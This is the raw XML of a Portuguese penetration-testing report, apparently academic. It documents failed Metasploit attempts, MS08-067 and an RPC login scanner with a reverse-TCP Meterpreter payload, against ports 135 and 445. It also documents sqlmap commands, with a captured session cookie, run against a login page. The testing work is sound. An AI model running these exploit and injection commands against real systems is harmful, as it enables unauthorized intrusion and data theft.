      <w:r w:rsidR="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uma</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bibliografia</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> muito ruim para iniciantes.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Não foi possível obter </w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nenhum resultado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2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E6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00902307">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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O exploit escolhido para testar o caso específico da porta RPC foi o </w:t>
      </w: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auxiliary/scanner/msf/msf_rpc_login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. O payload a ser executado é o </w:t>
      </w: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windows/meterpreter/reverse_tcp.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Esse payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP. </w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E" w:rsidRPr="00F15F8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E6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FE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E6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FEB" w:rsidP="003243CE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Pr="00F15F82" w:rsidRDefault="001A5B8E" w:rsidP="003243CE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spera-se que o exploit não consiga ser executado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243CE" w:rsidRDefault="005967D5" w:rsidP="003243CE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Default="008C6DC7" w:rsidP="003243CE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exploit foi enviado</w:t>
      </w:r>
      <w:r w:rsidR="003243CE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, mas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não trouxe resultado. Após verificação, foi constatado que o exploit é voltado pra Windows NT. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00F15F82" w:rsidRDefault="003243CE" w:rsidP="003243CE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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00F15F82" w:rsidRDefault="003243CE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E6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="003243CE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Tentar atacar a porta 445 usando exploits automatizados.</w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E" w:rsidRPr="00F15F8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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="003243CE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Para esse caso, o exploit escolhido foi o MS08-67 disponível no caminho </w:t>
      </w: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/windows/smb/ms08_067_netapi. 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Ele serve especificamente para explorar uma vulnerabilidade do </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft ds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. O payload é o utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="003243CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essão de teste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2: </w:t>
      </w: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windows/meterpreter/reverse_tcp.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Esse payload força a máquina atacada a abrir uma conexão com a máquina atacante via TCP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FE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E6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FEB" w:rsidP="003243CE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FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FEB" w:rsidP="003243CE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spera-se que o exploit não consiga ser executado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243CE" w:rsidRDefault="005967D5" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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F15F82" w:rsidRDefault="00D76012" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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.</w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> O exploit não foi executado na máquina do servidor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243CE" w:rsidRDefault="003243CE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51591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4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRDefault="003243CE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3243CE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Tentar atacar a porta 135.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="707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O exploit escolhido foi o </w:t>
      </w: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auxiliary/scanner/msf/msf_rpc_login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 para testar o caso específico da porta RPC escolhida. O payload a ser executado é o </w:t>
      </w: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windows/meterpreter/reverse_tcp.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Esse payload força a máquina atacada a abrir uma conexão com a </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB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máquina atacante via TCP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FE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E6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FEB" w:rsidP="003243CE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Pr="00F15F82" w:rsidRDefault="001A5B8E" w:rsidP="003243CE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spera-se que o exploit não consiga ser executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82" w:rsidRDefault="00751591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243CE" w:rsidRDefault="005967D5" w:rsidP="003243CE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Default="00D76012" w:rsidP="003243CE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.</w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> O exploit não foi executado na máquina do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00F15F82" w:rsidRDefault="003243CE" w:rsidP="003243CE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F15F82" w:rsidRDefault="003243CE" w:rsidP="003243CE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4.3.2.3 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Tela de Login – Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10D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Tarefa realizada no dia 11/04.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089C" w:rsidP="00AC10D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: 2 horas e 30 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Utilizar a ferramenta Sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="003243CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, abordada no subcapítulo 3.2,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para automatizar o processo de detecção de vulnerabilidades na tela de Login </w:t>
      </w:r>
      <w:r w:rsidR="003243CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizando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injeção SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRDefault="003243CE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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRDefault="008C6DC7" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="708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Verificar se a tela de Login é vulnerável a injeção de código SQL. Caso haja vulnerabilidade, conseguir obter o nome do banco de dados utilizado pelo sistema.</w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB" w:rsidRPr="00F15F82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3243CE" w:rsidRDefault="003243CE" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="708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243CE" w:rsidRPr="00F15F82" w:rsidRDefault="003243CE" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="708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</w:p>
    <w:p w:rsidR="00FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="00FE6FEB" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Para realizar essa Sessão de teste foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho de requisição HTTP no momento em que a página do Login é acessada. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2B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D038A" w:rsidRPr="00F15F82" w:rsidRDefault="000D038A" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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64AD8EBF" wp14:editId="714A14EB">
            <wp:extent cx="3971925" cy="12763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11(Editada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8E" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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Figura 11- Parâmetros obtidos através do Burp Suite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRDefault="003243CE" w:rsidP="003243CE">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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D20770" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="707"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mando utilizado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8C6DC7" w:rsidRPr="00B01036" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416" w:firstLine="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00B01036">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/</w:t>
        </w:r>
        <w:r w:rsidR="009C5396" w:rsidRPr="00B01036">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>nome_do_sistema</w:t>
        </w:r>
        <w:r w:rsidRPr="00B01036">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003243CE" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f"  -b  --current -db </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1560" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“./sqlmap.py” comando utilizado para executar a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="003243CE" w:rsidP="00211EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1560"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“-u” utilizado </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para especificar a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1560" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“--cookie” utilizado para especificar um cookie de sessão válido a ser passado para o Sqlmap durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00211EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1560" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“--current -db” utilizado para obter o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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20770" w:rsidRPr="00F15F82" w:rsidRDefault="00D20770" w:rsidP="00D20770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D20770" w:rsidRPr="00F15F82" w:rsidRDefault="00D20770" w:rsidP="00D20770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spera-se que a tela de Login não seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D20770" w:rsidRPr="00D20770" w:rsidRDefault="00D20770" w:rsidP="00D20770">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D20770" w:rsidRDefault="005967D5" w:rsidP="00D20770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latório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="00D20770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0770">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O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sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00F52870" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. A figura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12</w:t>
      </w:r>
      <w:r w:rsidR="00F52870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="00D20770">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mostra </w:t>
      </w:r>
      <w:r w:rsidR="00BF1C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">que </w:t>
      </w:r>
      <w:r w:rsidR="00D20770">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00BF1C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pós a</w:t>
      </w:r>
      <w:r w:rsidR="00D20770">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> execução e as inúmeras sessões</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidR="001A5B8E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s de injeção</w:t>
      </w:r>
      <w:r w:rsidR="00BF1C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o parâmetro informado no comando utilizado não é injetável.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F52870" w:rsidRPr="00F15F82" w:rsidRDefault="00F52870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BF1C7D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2776855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3905250" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="8" name="Arredondar Retângulo em um Canto Únic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42875"/>
                        </a:xfrm>
                        <a:prstGeom prst="round1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0D690" id="Arredondar Retângulo em um Canto Único 8" o:spid="_x0000_s1026" style="position:absolute;margin-left:35.7pt;margin-top:218.65pt;width:307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52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" path="m,l3881437,v13152,,23813,10661,23813,23813l3905250,142875,,142875,,xe" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;3881437,0;3905250,23813;3905250,142875;0,142875;0,0" o:connectangles="0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00EC5D2B" w:rsidRPr="00F15F82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42116BEA" wp14:editId="3165C341">
            <wp:extent cx="5476240" cy="40767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14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F52870" w:rsidP="00D20770">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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Figura 12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- Resultado aplicação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SQL Injection via Sqlmap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D20770" w:rsidRPr="00F15F82" w:rsidRDefault="00D20770" w:rsidP="00D20770">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00D20770">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="708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Repetir a ação da </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste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1 e aumentar o nível de heurística aplicada pelo Sqlmap na injeção de SQL para o valor máximo: 5.</w:t>
      </w:r>
      <w:r w:rsidR="00870818" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Com o incremento no valor de heurística, aumentaram também a profundidade da árvore de decisão usada nos ataques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00D20770" w:rsidP="00B17B93">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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mando utilizado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8C6DC7" w:rsidRPr="00B01036" w:rsidRDefault="008C6DC7" w:rsidP="00B17B93">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="1416" w:firstLine="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17B93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00B17B93">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/</w:t>
        </w:r>
        <w:r w:rsidR="002D4365" w:rsidRPr="00B17B93">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>nomeSistema</w:t>
        </w:r>
        <w:r w:rsidRPr="00B17B93">
          <w:rPr>
